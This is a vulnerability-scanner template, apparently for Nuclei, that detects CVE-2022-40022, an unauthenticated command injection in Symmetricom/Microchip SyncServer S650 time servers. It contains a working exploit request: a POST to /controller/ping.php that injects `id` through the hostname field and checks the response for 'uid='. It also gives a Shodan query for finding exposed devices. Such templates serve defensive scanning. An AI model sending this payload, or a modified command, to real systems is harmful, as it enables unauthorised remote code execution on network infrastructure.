id: CVE-2022-40022 info: name: Symmetricom SyncServer Unauthenticated - Remote Command Execution author: DhiyaneshDK severity: critical description: | Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2022-40022 - https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB - https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url= - https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 epss-score: 0.85269 epss-percentile: 0.98207 cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: microchip product: syncserver_s650_firmware shodan-query: html:"Symmetricom SyncServer" tags: packetstorm,cve,cve2022,syncserver,rce,unauth http: - raw: - | POST /controller/ping.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/controller/ping.php currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: regex part: body regex: - "uid=([0-9(a-z)]+)" - type: status status: - 302 # digest: 4b0a00483046022100e1db4cceabbcb76bf10475272a2dd95b432183b689bd2350a3365b3dd5b8a613022100d5810d51c8b84eba4f4b9330e7f8cef822a318f4c54bf8681176f859a38ea00c:922c64590222798bb761d5b6d8e72950